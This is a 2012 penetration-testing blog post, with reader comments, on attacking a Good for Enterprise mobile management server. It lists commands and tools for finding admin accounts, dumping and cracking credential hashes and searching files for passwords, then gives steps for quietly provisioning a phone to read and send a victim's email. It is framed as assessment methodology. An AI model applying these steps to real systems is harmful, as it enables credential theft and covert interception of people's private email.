Tuesday, April 17, 2012

Hack Tips: Good for Enterprise Exploitation

By Tony Lee.

Good’s website best describes their excellent product capabilities:

“Good for Enterprise™ is a suite of powerful mobile device management tools that bring military-grade security, end-to-end data loss prevention, and collaboration features to today's most popular smartphones and tablets — without compromising IT security and control.”
Source: http://www.good.com/products/good-for-enterprise.php

What we are discussing here is not an 0day against Good for Enterprise, but it is a methodology that can be used to inspect the security of the Good for Enterprise environment.


Overall, the process involves the following steps:

  1. Identifying the Good Enterprise Server
  2. Determine the Good Administrator
  3. Obtaining Good Administrator Credentials
  4. Accessing the Management Interface (Good Mobile Control)
  5. Provisioning devices and reading other’s email (Note: We are not lawyers--this might be a bad idea)

Identifying "Good for Enterprise" Servers

How to find or determine if you are sitting on a “Good for Enterprise” server (we found it based on DNS name and confirmed it with the following methods):

  1. Host naming scheme examples
    • \\GOOD
    • \\GOODMAIL
  2. Application directory
    • C:\Program Files (x86)\Good Technology\
  3. User accounts - Although there a no specific names for the service, the documentation uses "GoodAdmin", so perhaps some possible names would be:
    • Goodgmc
    • GoodAdmin
  4. Services - net start should contain:
    • Good Mobile Control server
    • GoodLink Server

Identifying "Good for Enterprise" Administrators

Try to determine the Good Administrators (We found a Good related file and viewed the properties to see who had rights on the file)

  1. Check for user accounts -
    • Net commands - net user
    • Check "Users" directory - C:\>dir c:\users
      Volume in drive C is OS
      Volume Serial Number is

      Directory of c:\users

      11/10/2011 08:10 AM <DIR> .
      11/10/2011 08:10 AM <DIR> ..
      12/02/2010 09:02 AM <DIR> <username>
      09/01/2011 10:08 AM <DIR> <username>
      07/13/2009 11:57 PM <DIR> Public
      05/19/2011 01:43 PM <DIR> Administrator
      11/07/2011 03:26 PM <DIR> Goodadmin
      09/21/2011 04:02 AM <DIR> GoodGMC
      0 File(s) 0 bytes
      8 Dir(s) 23,495,675,904 bytes free

  2. File permissions of Application Files
    • Right click file -> Properities -> Security Tab

Identifying "Good for Enterprise" Account Credentials

We used Windows Credential Editor to grab hashes from memory for a Good Administrator and cracked them

  1. With the Good Administrator account identified, dump password hashses
    • hashdump
    • gsecdump
    • fgdump
    • Other favorites
  2. Find files that may contain credentials
    • findstr /I /S /M pass c:\*
    • dir /a /s /b c:\*pass*
  3. Windows Credential Editor to target Domain accounts- :
    • C:\> wce.exe
      WCE v1.2 (X64) (Windows Credentials Editor) - (c) 2010,2011 Amplia Security – by Hernan Ochoa (hernan@ampliasecurity.com)
      Use -h for help.

      User: Domain:00000000000000000000000000000000:B9BLAHBLAHBLAHBLAHBLAHBLAHBAC
      GoodGMC: Domain:00000000000000000000000000000000:7D3BLAHBLAHBLAHBLAHBLAHBLAHFA3
      BINGO! LM Hash (has rights on the Good file)
      Account called GoodAdmin, would have to replay this hash - a possibility

Accessing The Management Interface (Good Mobile Control)

To identify if the HTTP interface is running

Via the command line:
C:\ >netstat -ano | findstr 8443
TCP [::]:8443 [::]:0 LISTENING 3804

Via the Browser:
  • http://<GoodServer> redirects to secure login over 8443 at the URL below
  • https://<GoodServer>:8443/login.do

Sample of the Good Mobile Control Interface - Source: http://www.c-cure.dk/Images/Producenter/Good/GoodMobileControl.PNG

Covertly Reading Emails

Once logged into the Good Mobile Control interface, you have full power to lock, remotely wipe, and configure new handhelds.

You are not able to generate a new Over-The-Air (OTA) code for a current account as you should receive the following error when trying to do so:

“This email address has already been set up on another handheld. Contact your IT administrator” -I hate those error messages—especially if we are the IT administrator. Doh!

However, you can add a handheld to an already existing user to read their email.

Reading email without the user's knowledge

Check the policy that that you are about to create your user under to ensure that a welcome email does not get emailed to the user:

Log into Good Mobile Control web interface -> Policies tab -> Provisioning link -> Welcome Email and verify that “Send welcome email after OTA Provisioning PIN is created” is unchecked.

If it is checked, create a copy of the policy and uncheck that welcome email setting:

Log into Good Mobile Control web interface -> Policies tab -> Check the policy you want to copy and click the button that says “Make Copy”. Now, click on the policy hyperlink -> Provisioning link -> Welcome Email and verify that “Send welcome email after OTA Provisioning PIN is created” is unchecked.

Provisioning a new handheld to read user email

  1. Handhelds tab -> “Add Handhelds” button -> Search for a User -> Click “Look Now” -> Select the Policy and Messaging server then Click “Add”
  2. Under the handhelds tab you will have a blank entry with just a name. Click the hyperlink for the person
  3. Click on the OTA link on the left and the OTA pin displayed is valid
  4. Download the Good application from the market the enter the email address of the victim and the OTA pin displayed on the Good Mobile Control page.
  5. Read and “mark as unread” to your heart’s content. You can even send emails as this person, however be sure to delete the email from the sent folder—you may want to have them reply to you on your “personal” email address at victimsname@gmail.com for further correspondence :0 ;)

Are you sure you are the only one reading your email?


  1. This Attack Vector looks like it is more geared to a sneaky insider on a lower class Network where the admins are not making use of some basic mitigation techniques or a network where the sysadmin my have unintentionally exposed there GMC to the external internet by allowing forward of port 8443 out through the firewall.

  2. Thanks for the feedback. Insider threats are definitely a possibility, but don’t forget about what happens after a network is compromised. The purpose of the hack tips series is to go beyond the hack to obtain domain admin or enterprise admin. Getting EA or DA does not always properly convey the impact to management as it may be missing that "so what" factor. Furthermore, good adversaries will leverage their access to attack other critical components such as the network infrastructure, mobile platforms, etc.--so we shouldn't forget about them just because they are behind the perimeter firewall. Happy Hacking.

  3. This is not a "hack". I can hack any server and application that i have permissions to - this is a joke.

    1. I'm sorry that you feel that it is not a hack. The challenge was to go from a compromised host (not necessarily the Good Server) to provisioning a phone without anyone noticing. Thus, we never had permission to log into the server or the application, we had to gain that.

      As an example, imagine an attacker breaks into your network (remote exploit, web, phish, whatever) and wants to provision a phone as the CEO without anyone noticing... This is one possibility on how it might be accomplished. Wdigest saves you the time of cracking the password though. :)